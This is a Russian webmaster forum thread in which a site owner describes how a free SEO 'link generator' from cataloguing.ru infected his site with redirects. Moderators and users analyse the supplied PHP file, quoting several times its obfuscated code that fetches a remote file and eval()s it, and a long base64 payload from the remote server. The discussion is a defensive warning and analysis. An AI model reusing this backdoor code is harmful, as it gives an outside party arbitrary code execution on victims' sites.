VIP mrak7575 349 Posted February 6, 2016 VIP Report Share Posted February 6, 2016 всем привет! поделюсь с вами одной историей. В общем у меня есть сайт тематики адалт. посещаемость 450-600 чел. в сутки Для продвижения покупаю ссылки и прочее. но вот на 1 из форумов нашел статейку и там стаяли коментарии типа: Советую всетаки старый проверенный сервис cataloguing(точка) ру тиц на 50-60 растет после этих прогонов. и множество положительных отзывов. ну думаю дай ка я зайду на сайтик. cataloguing(точка)ру написано куча текста вроде нормальный сервис предлагают скачать файлик (гениратор ссылок) как любитель халявы я качаю и кидаю на сайт , запускаю показывается окно типа происходит регистрация бегают циферки и движется шкала. вроде всё гуд. в общем не дожидаясь окончания я вырубаю на 15% ну и жду индексации и прочего (было это в сентябре 2015) сайт имел тиц 10 и посещалка 450-600. в декабре 2015 тиц обнулили ((. траф упал 350-400 я в панике ... ну ладно переживем .. в январе затеял реконструкцию шаблона (чето делал не помню) на компе стоит 2 браузера (для волидности проверяю на обоих , всё норм) затем решил проверить как на телефоне показывается открываю по своему адресу и бац открылся сайт cataloguing(точка)ру Я в недоумении ! рекламы на сайте нет но чегото директ сработал проверяю ещё раз все норм. проверяю на вирусы на различных сайтах ____ всё норм странно!! ладно может "пенный напиток дал в мозг" проходит пару дней решил почистить реестр Далее запускаю программу CCleaner она сработала "гуд" захожу на сайт свой и бац перекидывает на cataloguing(точка)ру Удивление!!! захожу заново всё гуд ... чищу прогой копм захожу перекидывает на cataloguing(точка)ру и понимаю как я добравольно заразил сайт.... начинаю гуглить и пытаться найти решение но чего то немогу в этоге нашел на компе версию сайта за август месяц и благополучно востановил сайт. редикт привел к куче отказов и понижении в выдаче мораль сей истории БЕСПЛАТНО только в мышеловке! остерегайтесь халявы и сайта cataloguing (точка) ру и наш форум тоже написали эту гадость http://pr-cy.ru/qa/question/27703 и http://pr-cy.ru/qa/question/27695 кстате я писал в тех поддержку результат 0. вот переписка mrak7575 (12.01.2016 21:32): Доброе время суток , но мне кажется тут беда случается вот темы http://pr-cy.ru/qa/question/27703 и http://pr-cy.ru/qa/question/27695 продвигают это cataloguing.ru есть такое подозрение что на этом сайте шейлы кидают на сайт проверьте учетки которые пишут коменты . ведь прогоны обычно за деньги делают , а тут прям бесплатный сервис и прочее .. ну может я ошибаюсь ! но ведь бдительность не наказуема )) срочный поставил так как чем меньше увидят темы тем лучше + проверьте пожалуйста темосоздателей )) может боты делают темы ? Администрация (12.01.2016 21:48): Уважаемый mrak7575! Здравствуйте, Ваш запрос будет рассмотрен, спасибо за обращение. С Уважением, Прасковья Суровая темы обе открыты до сих пор ! )) Riminy, sheynhjk, Griffin and 1 other 4 Link to post Share on other sites
Модератор Воланд 5018 Posted February 6, 2016 Модератор Report Share Posted February 6, 2016 1. Сто раз уже говорили про прогоны... 2. На основе одного мнения тех поддержка выводов не делает, мы не знаем всей ситуации 3. Пользователь, который рекламировал уже давно забанен Link to post Share on other sites
Guest werstey Posted February 6, 2016 Report Share Posted February 6, 2016 Вы молодец что написали об этом. Возможно кто то перед регистрацией у них, погуглит и встретит ваш пост Link to post Share on other sites
VIP mrak7575 349 Posted February 6, 2016 Author VIP Report Share Posted February 6, 2016 я конечно не осуждаю тех. поддержку, просто написал что я упомянул им есть подозрения , разве по IP нельзя определить что это скрытая реклама. надеюсь администрация удалит те темы (так как при загугливании новые пользователи опять зарегаются на сайте по "рекомендациям" просто я давно собирался с мыслями . и сегодня что то решил по гуглить по форумам и опять наткнулся на комментарии. сейчас пойду в антивируссники жаловаться ! и если вы хотите проверить достоверность моих слов то скачайте файл и поставьте на сайт (который не жалко) и убедитесь (но это опасно ! )) Link to post Share on other sites
Модератор Воланд 5018 Posted February 6, 2016 Модератор Report Share Posted February 6, 2016 я конечно не осуждаю тех. поддержку, просто написал что я упомянул им есть подозрения , разве по IP нельзя определить что это скрытая реклама. надеюсь администрация удалит те темы (так как при загугливании новые пользователи опять зарегаются на сайте по "рекомендациям" просто я давно собирался с мыслями . и сегодня что то решил по гуглить по форумам и опять наткнулся на комментарии. сейчас пойду в антивируссники жаловаться ! и если вы хотите проверить достоверность моих слов то скачайте файл и поставьте на сайт (который не жалко) и убедитесь (но это опасно ! )) По IP не проверишь....ТОР и остальные аноминайзеры делают свое дело. А насчет попробовать....ага, сейчас побегу на форум это чудо ставить Link to post Share on other sites
Модератор files 2844 Posted February 6, 2016 Модератор Report Share Posted February 6, 2016 Открыл их код файла (1.php), который они предлагают установить на сайт: <?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?> С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ. Но всмотритесь теперь в строчку кода: $q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q; Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные. Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес! Riminy, sairon, rohanaro and 14 others 17 Link to post Share on other sites
VIP mrak7575 349 Posted February 6, 2016 Author VIP Report Share Posted February 6, 2016 По IP не проверишь....ТОР и остальные аноминайзеры делают свое дело. А насчет попробовать....ага, сейчас побегу на форум это чудо ставить хм. я когда то общался с тех поддержкой так меня уверяли что она все властна! а вы пишите что нет! но если логически размышлять ! то 2 разных аккаунтах которые (1 -3 дня отроду ) пишут об 1 и том же ! это как бы вежливые спамщики (как то писал Воланд на форуме) да и нужно насторожиться когда человек пользуется подобными (торами и др. методами сокрытия IP , конечно каждый имеет право на сокрытие своих данных! но ! во главе администрации люди далеко не дилетанты ведь можно разработать какие то ограничения (если человек скрывает свой ip значит он не чист на руку ) ведь куча тем что мошенники в сети Но тот кто повелся на этот развод то это вина тех кто повелся, а не администрации площадок где размещены" положительные комментарии" прошу только эту темы не удалять ! чтоб уберечь остальных ! ) Link to post Share on other sites
VIP mrak7575 349 Posted February 6, 2016 Author VIP Report Share Posted February 6, 2016 Открыл их код файла (1.php), который они предлагают установить на сайт: <?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?> С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ. Но всмотритесь теперь в строчку кода: $q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q; Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные. Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес! большое спасибо за расстолкование php кода ! sairon 1 Link to post Share on other sites
sairon 386 Posted February 6, 2016 Report Share Posted February 6, 2016 Открыл их код файла (1.php), который они предлагают установить на сайт: <?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?> С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ. Но всмотритесь теперь в строчку кода: $q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q; Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные. Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес! Хорошо, что на форуме есть подобного рода специалисты. Приятно читать, и да, очень интересно. Спасибо. mrak7575, AlexBrush and Griffin 3 Link to post Share on other sites
Модератор Воланд 5018 Posted February 7, 2016 Модератор Report Share Posted February 7, 2016 хм. я когда то общался с тех поддержкой так меня уверяли что она все властна! а вы пишите что нет! но если логически размышлять ! то 2 разных аккаунтах которые (1 -3 дня отроду ) пишут об 1 и том же ! это как бы вежливые спамщики (как то писал Воланд на форуме) да и нужно насторожиться когда человек пользуется подобными (торами и др. методами сокрытия IP , конечно каждый имеет право на сокрытие своих данных! но ! во главе администрации люди далеко не дилетанты ведь можно разработать какие то ограничения (если человек скрывает свой ip значит он не чист на руку ) ведь куча тем что мошенники в сети Но тот кто повелся на этот развод то это вина тех кто повелся, а не администрации площадок где размещены" положительные комментарии" прошу только эту темы не удалять ! чтоб уберечь остальных ! ) Тему удалять конечно не буду, тем более факт залива шелла доказан, а насчет тех поддержки, у нас огромное количество пользователей....предлагаете следить за каждым новорегом? мы тогда жить на пр су будем (хотя и сейчас почти живем) webostrov and k-park 2 Link to post Share on other sites
VIP mrak7575 349 Posted February 8, 2016 Author VIP Report Share Posted February 8, 2016 сегодня по моей жалобе сайт cataloguing(точка) ру занесен в базу нежелательных сайтов ))) жду когда яндекс отпишится Link to post Share on other sites
admin_nu7 97 Posted February 8, 2016 Report Share Posted February 8, 2016 Вот спасибо за такую информацию теперь будем знать что не нужно им пользоваться. zhekaglava 1 Link to post Share on other sites
anomalii 0 Posted February 11, 2016 Report Share Posted February 11, 2016 Открыл их код файла (1.php), который они предлагают установить на сайт: <?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?> С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ. Но всмотритесь теперь в строчку кода: $q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q; Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные. Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес! а как можно исправить это - спасти свой сайтик? тоже попался на их удочку Link to post Share on other sites
Модератор files 2844 Posted February 11, 2016 Модератор Report Share Posted February 11, 2016 а как можно исправить это - спасти свой сайтик? тоже попался на их удочку Не ставить их кода. Если поставили - надо чистить сайт от шеллов, они могут быть в самых непредсказуемых местах. mrak7575 1 Link to post Share on other sites
anomalii 0 Posted February 11, 2016 Report Share Posted February 11, 2016 Не ставить их кода. Если поставили - надо чистить сайт от шеллов, они могут быть в самых непредсказуемых местах. так случилось у меня в жизни что я из тех кто "уже там...", я неособо глубоко в этом разбираюсь, помогите пожалуйста, подскажите где хоть примерно нужно смотреть, или на чт ообратить внимание...сайт anomalii.net . заранее благодарен хоть за малейшую помощь Link to post Share on other sites
Модератор files 2844 Posted February 11, 2016 Модератор Report Share Posted February 11, 2016 так случилось у меня в жизни что я из тех кто "уже там...", я неособо глубоко в этом разбираюсь, помогите пожалуйста, подскажите где хоть примерно нужно смотреть, или на чт ообратить внимание...сайт anomalii.net . заранее благодарен хоть за малейшую помощь Сканируйте сайт антивирусами: Логи лучше показать специалистам. https://www.revisium.com/ai/ https://yandex.ua/promo/manul#about http://virusonsite.ru/download/ campusboy 1 Link to post Share on other sites
anomalii 0 Posted February 11, 2016 Report Share Posted February 11, 2016 Сканируйте сайт антивирусами: Логи лучше показать специалистам. https://www.revisium.com/ai/ https://yandex.ua/promo/manul#about http://virusonsite.ru/download/ спасибо, буду заниматься Link to post Share on other sites
anomalii 0 Posted February 11, 2016 Report Share Posted February 11, 2016 Сканируйте сайт антивирусами: Логи лучше показать специалистам. https://www.revisium.com/ai/ https://yandex.ua/promo/manul#about http://virusonsite.ru/download/ интересно было б услышать мнение хоть кого-то кто поборол эти вмешательства в сайт, ведь "взломщики" скорей всего ведь по каким-то шаблонам работают... Link to post Share on other sites
VIP mrak7575 349 Posted February 11, 2016 Author VIP Report Share Posted February 11, 2016 народ пишите жалобы яндексу гуглу и антивируснику. я написал ответ пришел только от доктора ВЕБА , они внесли в список подозрительных чем больше жалоб тем лучше будет! накажем их вместе ))) Link to post Share on other sites
Модератор files 2844 Posted February 11, 2016 Модератор Report Share Posted February 11, 2016 народ пишите жалобы яндексу гуглу и антивируснику. я написал ответ пришел только от доктора ВЕБА , они внесли в список подозрительных чем больше жалоб тем лучше будет! накажем их вместе ))) Репутация у них давно испорчена https://www.mywot.com/ru/scorecard/cataloguing.ru Ставьте в браузер мою тулзу - всегда будете осведомлены о рисках на просматриваемых сайтах Link to post Share on other sites
Pavlik__12 0 Posted February 28, 2016 Report Share Posted February 28, 2016 Сканируйте сайт антивирусами: Логи лучше показать специалистам. https://www.revisium.com/ai/ https://yandex.ua/promo/manul#about http://virusonsite.ru/download/ Доброго времени суток! Подскажите, пожалуйста, как с Вам можно связаться по поводу заражения сайта ? ПМ в профиле отсутствуют... Link to post Share on other sites
Модератор files 2844 Posted February 28, 2016 Модератор Report Share Posted February 28, 2016 Доброго времени суток! Подскажите, пожалуйста, как с Вам можно связаться по поводу заражения сайта ? ПМ в профиле отсутствуют... Мои контакты в моем профиле, жмите на аватарку Link to post Share on other sites
TaraZZZ 1 Posted March 14, 2016 Report Share Posted March 14, 2016 Открыл их код файла (1.php), который они предлагают установить на сайт: <?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?> С виду,хоть и зашифровано, но на первый взгляд не вызывает подозрений. Он тянет и отображает на вашем сайте содержимое файла cataloguing.ru/work.txt (который также в base64) - а там "ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ". То есть, вроде бы все законно,вы открываете их файл у себя на хостинге - ваш_сайту.ру/1.php и видите эту самую безобидную ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ. Но всмотритесь теперь в строчку кода: $q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q; Она добавляет к файлу 1.php возможность передать GET запросом (?q=) на ваш хостинг любые данные. Таким образом, вы сами открываете возможность удаленным хакерам закачать вам шелл. Сигналом хакерам, что у них очередной улов, служит нажатие вами кнопки "Выполнить прогон", вы сами светите им свой домен, и к вам заходят (как по фтп). Занавес! Я не знаю что это за система вообще (не использовал никогда) но анализ кода был проведен не совсем коректно <?php // отключение отображения ошибок ini_set('display_errors', 'Off'); error_reporting('E_ALL'); $b = base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0'); // --> $b = 'http://cataloguing.ru/work.txt'; $q = $_GET['q']; if ($q) $b. = base64_decode('P3E9').$q; // if ($_GET['q']) $b .= '?q=' . $_GET['q']; получаем такую ссылку --> http://cataloguing.ru/work.txt?q=test'>http://cataloguing.ru/work.txt?q=test $d = file_get_contents($; // --> Загружаем файл по полученной ссылке выше ^ eval($d); // --> Выполняем загруженный файл как PHP ^ - здесь самая большая опасность, если администрация не добросовестная то тут может выполняться все что угодно Код выше не позволяет любому загружать шелл, только тем кто владеет cataloguing.ru, так как вы не знаете что будет выполнено после загрузки файла (http://cataloguing.ru/work.txt) что само по себе очень опасно. Копаем глубже. Загружаем файл http://cataloguing.ru/work.txt: header("Content-type: text/html; charset=UTF-8");echo base64_decode('<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ</title>
    <link href="http://cataloguing.ru/css/panel.css" rel="stylesheet" type="text/css" media="screen" />
    <link href="http://cataloguing.ru/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
    <script type="text/javascript">createPopup().show( 0, 0, 0, 0, 0 );</script>
</head>
<body oncontextmenu="return false;">
    <div id="main">
        <div id="new"><h1>ПАНЕЛЬ УПРАВЛЕНИЯ</h1><a href="http://cataloguing.ru"><img src="data:image/png;base64,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